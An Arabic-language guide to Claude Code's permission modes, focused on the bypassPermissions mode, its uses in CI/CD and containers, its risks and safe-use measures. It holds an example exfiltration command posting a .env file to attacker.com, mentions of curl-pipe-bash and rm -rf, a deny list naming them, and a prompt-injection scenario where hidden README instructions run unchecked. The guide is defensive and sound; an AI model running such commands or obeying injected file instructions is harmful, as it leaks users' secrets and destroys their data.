وضع تجاوز الصلاحيات في Claude Code: المخاطر والحلول

وضع تجاوز الصلاحيات في Claude Code: المخاطر الأمنية وطرق الاستخدام الآمن

المحتويات

1. ما هو وضع تجاوز الصلاحيات
2. أوضاع الصلاحيات الخمسة في Claude Code
3. متى يكون وضع التجاوز مفيداً
4. خمسة مخاطر أمنية
5. إجراءات الاستخدام الآمن
6. دليل اختيار وضع الصلاحيات
7. الملخص
الأسئلة الشائعة

يتضمن Claude Code وضعاً يُعرف بـ«تجاوز الصلاحيات» (bypassPermissions) يسمح بتنفيذ جميع العمليات دون أي تأكيد من المستخدم. هذا الوضع مفيد للغاية في بيئات CI/CD وحاويات Docker، لكن الاستخدام غير المدروس قد يفتح الباب أمام مخاطر أمنية خطيرة.

في هذا المقال، نستعرض أوضاع الصلاحيات الخمسة في Claude Code، ثم نتناول بالتفصيل فوائد وضع التجاوز ومخاطره وطرق استخدامه بأمان مع أمثلة عملية.

1. ما هو وضع تجاوز الصلاحيات

وضع تجاوز الصلاحيات يقوم بإلغاء جميع مطالبات التأكيد التي يعرضها Claude Code أثناء العمل. في الوضع العادي، يطلب Claude Code موافقة المستخدم قبل تعديل الملفات أو تنفيذ أوامر الشل، أما في وضع التجاوز فلا تظهر أي مطالبات.

هناك طريقتان لتفعيل هذا الوضع:


# Flag activation
claude --dangerously-skip-permissions

# Or via permission mode
claude --permission-mode bypass

لاحظ أن اسم العلَم يتضمن كلمة «dangerously» (بشكل خطير)، وهو تحذير متعمد من Anthropic. الغرض من هذا الوضع هو تمكين الأتمتة في بيئات معزولة تماماً (حاويات أو أجهزة افتراضية).

حتى في وضع التجاوز، تظل الكتابة محظورة في مجلدات الإعدادات مثل .git/ و.vscode/ و.idea/ و.claude/، وهذا يمثل الحد الأدنى من الحماية.

2. أوضاع الصلاحيات الخمسة في Claude Code

يوفر Claude Code خمسة مستويات من الصلاحيات، يختلف كل منها في نطاق العمليات المسموح بها دون تأكيد.

جدول مقارنة أوضاع الصلاحيات الخمسة في Claude Code: default وacceptEdits وplan وauto وbypassPermissions

تفاصيل كل وضع

default (الافتراضي): القراءة فقط دون تأكيد. يتطلب التعديل وتنفيذ الأوامر موافقة المستخدم. مثالي للمبتدئين والبيئات الحساسة.

acceptEdits (الموافقة التلقائية على التعديلات): القراءة والتعديل دون تأكيد، لكن تنفيذ أوامر الشل يتطلب موافقة. وضع متوازن مناسب للعمل اليومي.

plan (التخطيط): وضع للقراءة فقط بالكامل، لا يمكن تعديل الملفات أو تنفيذ الأوامر. مناسب لاستكشاف الكود والتخطيط.

auto (التلقائي): تُنفَّذ معظم العمليات دون تأكيد، لكن مصنّف الأمان (safety classifier) يعمل في الخلفية ويحجب العمليات الخطرة. مناسب للمهام الطويلة.

bypassPermissions (تجاوز الصلاحيات): يتم تعطيل جميع عمليات التحقق بما فيها مصنّف الأمان. مصمم للاستخدام في الحاويات والأجهزة الافتراضية فقط، ولا توصي Anthropic باستخدامه في البيئات المحلية.

يمكن التبديل بين الأوضاع عبر علَمات سطر الأوامر عند التشغيل، أو باستخدام اختصار Shift+Tab أثناء الجلسة. وهو مدعوم أيضاً في VS Code وJetBrains وتطبيق سطح المكتب.

3. متى يكون وضع التجاوز مفيداً

وضع التجاوز ليس مجرد وضع «خطير» — بل يعزز كفاءة التطوير بشكل كبير عند استخدامه في البيئة المناسبة.

أنابيب CI/CD

في بيئات مثل GitHub Actions وGitLab CI، لا يوجد مستخدم يمكنه الاستجابة لمطالبات التأكيد. يتيح وضع التجاوز أتمتة كاملة للاختبارات ومراجعة الكود وتوليد الوثائق.


# GitHub Actions example
claude --dangerously-skip-permissions \
  -p "Run tests and report results"

داخل حاويات Docker

عند التنفيذ في حاويات مؤقتة، لا يشكل تلف الحاوية مشكلة. «خطورة» وضع التجاوز تُلغى بفضل عزل الحاوية.

المعالجة الجماعية للملفات

عند تعديل أكثر من 100 ملف دفعة واحدة، تصبح مطالبات التأكيد المتكررة عبئاً كبيراً. في بيئة معزولة، يمكن لوضع التجاوز معالجة الملفات بكفاءة عالية.

التكامل مع سكريبتات الأتمتة

المعالجات الدورية وأنابيب توليد الكود تحتاج للعمل دون تدخل بشري. وضع التجاوز ضروري لهذا النوع من التشغيل بدون واجهة (headless).

4. خمسة مخاطر أمنية

استخدام وضع التجاوز في بيئة غير معزولة يُعرّضك للمخاطر التالية:

المخاطر الأمنية الخمسة لوضع التجاوز: حقن الأوامر، تنفيذ أوامر عشوائية، تسريب البيانات، تصعيد العمليات، عمليات تدميرية لا رجعة فيها

المخاطر 1: حقن الأوامر (Prompt Injection)

أخطر المخاطر. قد تحتوي ملفات خبيثة (مثل تعليمات مخفية في README أو package.json) على أوامر يتم تنفيذها مباشرة دون فحص.

في الأوضاع العادية، تظهر مطالبة تأكيد قبل تنفيذ الأوامر المشبوهة مما يتيح للمستخدم حجبها. في وضع التجاوز لا يوجد هذا الحاجز الدفاعي.

مثال عملي

إذا احتوى ملف README في مستودع خارجي على تعليق مخفي مثل ، ففي وضع التجاوز قد يُنفَّذ هذا الأمر دون أي تأكيد.

المخاطر 2: تنفيذ أوامر عشوائية

أوامر مثل curl | bash وrm -rf وتثبيت الحزم تُنفَّذ فوراً. في الوضع التلقائي (auto) يحجب مصنّف الأمان الأوامر الخطرة، لكن في وضع التجاوز يتم تعطيل هذا المصنّف.

المخاطر 3: تسريب البيانات

قد تُنفَّذ أوامر ترسل معلومات حساسة مثل ملفات .env والمفاتيح السرية ورموز التوثيق إلى خوادم خارجية دون تأكيد. مثال: curl -d @.env https://attacker.com.

المخاطر 4: تصعيد العمليات

قد تبدأ المهمة بتعديل ملفات بسيط ثم تتطور لاحقاً إلى نشر في بيئة الإنتاج أو تنفيذ ترحيل قاعدة البيانات. في الأوضاع العادية تظهر تأكيدات تدريجية، أما في وضع التجاوز فلا توجد هذه الضمانات.

المخاطر 5: عمليات تدميرية لا رجعة فيها

أوامر مثل git push --force والحذف النهائي للملفات وDROP TABLE في قاعدة البيانات قد تُنفَّذ دون تأكيد ولا يمكن التراجع عنها.

5. إجراءات الاستخدام الآمن

إذا كنت بحاجة لاستخدام وضع التجاوز، اتبع الإجراءات التالية:

الإجراء 1: الاقتصار على الحاويات والأجهزة الافتراضية

أهم إجراء على الإطلاق. استخدم وضع التجاوز حصرياً في بيئات معزولة مثل حاويات Docker والأجهزة الافتراضية وبيئات CI. تجنب التنفيذ المباشر على النظام المضيف.

الإعداد الموصى به

شغّل Claude Code داخل Docker مع تقييد وحدات التخزين المربوطة على مجلد العمل فقط. لا تربط ملفات .env أو مفاتيح SSH بالحاوية.

الإجراء 2: تقييم الوضع التلقائي (auto) أولاً

في أغلب الحالات يكفي الوضع التلقائي. يعمل مصنّف الأمان في الخلفية ويحجب الأوامر الخطرة الواضحة. لا تختر وضع التجاوز لمجرد أن مطالبات التأكيد مزعجة.

الإجراء 3: التحكم الدقيق بقوائم السماح

باستخدام نظام قواعد الصلاحيات في Claude Code، يمكنك السماح تلقائياً لأوامر محددة فقط. هذا بديل أكثر أماناً من وضع التجاوز.


# .claude/settings.json permission rules
{
  "permissions": {
    "allow": [
      "Bash(npm run build)",
      "Bash(npm test)",
      "Bash(git status)"
    ],
    "deny": [
      "Bash(curl *)",
      "Bash(rm -rf *)"
    ]
  }
}

تُقيَّم القواعد بترتيب deny → ask → allow. تحظى deny بالأولوية القصوى، لذا فإن حظر أمر خطير صراحةً لن يُلغى بواسطة قاعدة allow.

الإجراء 4: المراقبة بواسطة Hooks

باستخدام ميزة Hooks في Claude Code (أحداث PreToolUse / PostToolUse)، يمكنك تشغيل سكريبتات مخصصة قبل وبعد استخدام الأدوات. لكن هناك ملاحظة مهمة: في وضع التجاوز تُعطَّل Hooks أيضاً.

لذلك، تكون المراقبة بواسطة Hooks فعّالة مع الوضع التلقائي (auto).


# PreToolUse hook example (.claude/settings.json)
{
  "hooks": {
    "PreToolUse": [{
      "matcher": "Bash",
      "hooks": [{
        "type": "command",
        "command": "echo $CLAUDE_TOOL_INPUT | check-safety.sh"
      }]
    }]
  }
}

الإجراء 5: تقييد الشبكة

حتى داخل الحاوية، قيّد الوصول إلى الشبكة الخارجية للحد من مخاطر تسريب البيانات. المثالي هو السماح فقط بنقاط الاتصال الضرورية (مثل Anthropic API).

الإجراء 6: المراجعة الدقيقة بعد العمل

بعد العمل في وضع التجاوز، راجع التغييرات باستخدام git diff. تأكد من عدم وجود تعديلات غير مقصودة أو تسريب لمعلومات حساسة.

6. دليل اختيار وضع الصلاحيات

عندما تحتار في اختيار الوضع المناسب، استرشد بالمخطط التالي:

مخطط اختيار وضع الصلاحيات: كيفية اختيار الوضع الأنسب حسب طبيعة العمل

الإعدادات الموصى بها حسب السيناريو

العمل اليومي في البرمجة: وضع acceptEdits هو الأنسب. تمر تعديلات الملفات بسلاسة مع الحفاظ على التأكيد عند تنفيذ الأوامر.

استكشاف الكود والتخطيط: وضع plan يمنع التعديلات غير المقصودة. يمكنك استكشاف قاعدة الكود بأمان لأنه للقراءة فقط.

المهام الطويلة المؤتمتة: الوضع التلقائي (auto) مع بيئة معزولة هو الأفضل. يوفر مصنّف الأمان مستوى معقولاً من الحماية مع الأتمتة.

أنابيب CI/CD: وضع التجاوز مع عزل الحاوية هو الخيار المناسب. لكن لا تنسَ تقييد الشبكة وتقليل وحدات التخزين المربوطة.

لمعرفة المزيد عن ميزات Claude Code الأخرى، اطلع على الفرق بين ميزات Claude الثلاث. وللاطلاع على خطط الأسعار راجع مقارنة أسعار Claude وChatGPT.

7. الملخص

وضع تجاوز الصلاحيات في Claude Code أداة قوية في البيئة المناسبة، لكن الاستخدام الخاطئ قد يتسبب في حوادث أمنية خطيرة.

أبرز النقاط

يتضمن Claude Code خمسة أوضاع للصلاحيات، ووضع التجاوز هو الأعلى خطورة
يجب اعتبار وضع التجاوز مخصصاً للحاويات والأجهزة الافتراضية وبيئات CI/CD فقط
حقن الأوامر وتسريب البيانات والعمليات غير القابلة للتراجع هي أبرز المخاطر
في أغلب الحالات، يكفي الوضع التلقائي (auto) مع قواعد الصلاحيات
عند الاستخدام، التزم بتقييد الشبكة وتقليل وحدات التخزين والمراجعة بعد العمل

إذا كنت مهتماً بالأمان عند استخدام أدوات الذكاء الاصطناعي، جرّب اختبار مستوى الذكاء الاصطناعي لتقييم معرفتك. ويمكنك تعلم Claude Code بشكل منهجي عبر الدورة التمهيدية.

الأسئلة الشائعة

هل يمكنني استخدام وضع التجاوز في البرمجة اليومية؟

لا يُنصح بذلك. استخدم وضع acceptEdits (الموافقة التلقائية على التعديلات) أو الوضع التلقائي (auto) للعمل اليومي. وضع التجاوز مصمم للبيئات المعزولة تماماً مثل حاويات Docker وأنابيب CI/CD. استخدامه في بيئة التطوير المحلية يعرّضك لمخاطر حقن الأوامر وتنفيذ أوامر غير مقصودة.

ما الفرق بين الوضع التلقائي (auto) ووضع التجاوز؟

يعمل مصنّف الأمان في الخلفية أثناء الوضع التلقائي ويحجب العمليات الخطرة. أما في وضع التجاوز فيتم تعطيل جميع عمليات التحقق بما فيها المصنّف. كذلك تعمل أحداث Hooks (PreToolUse / PostToolUse) في الوضع التلقائي لكنها تُعطَّل في وضع التجاوز.

هل هناك عمليات تُحظر حتى في وضع التجاوز؟

نعم. تظل الكتابة في مجلدات .git/ و.vscode/ و.idea/ و.claude/ محظورة حتى في وضع التجاوز. هذه مجلدات حيوية لإعدادات بيئة التطوير وتبقى محمية كحد أدنى. لكن خارج هذه المجلدات، لا توجد قيود تُذكر على عمليات الملفات أو أوامر الشل.

هل يمكن استخدام قواعد الصلاحيات (allow/deny) مع وضع التجاوز؟

في وضع التجاوز يتم تخطي تقييم قواعد الصلاحيات بالكامل، لذا لا فائدة من استخدامهما معاً. لتفعيل قواعد الصلاحيات، استخدم الوضع التلقائي (auto) أو وضع acceptEdits. تُقيَّم القواعد بترتيب deny → ask → allow حيث تحظى deny بالأولوية القصوى، مما يضمن حظر أوامر محددة بشكل موثوق.

وضع تجاوز الصلاحيات في Claude Code: المخاطر الأمنية وطرق الاستخدام الآمن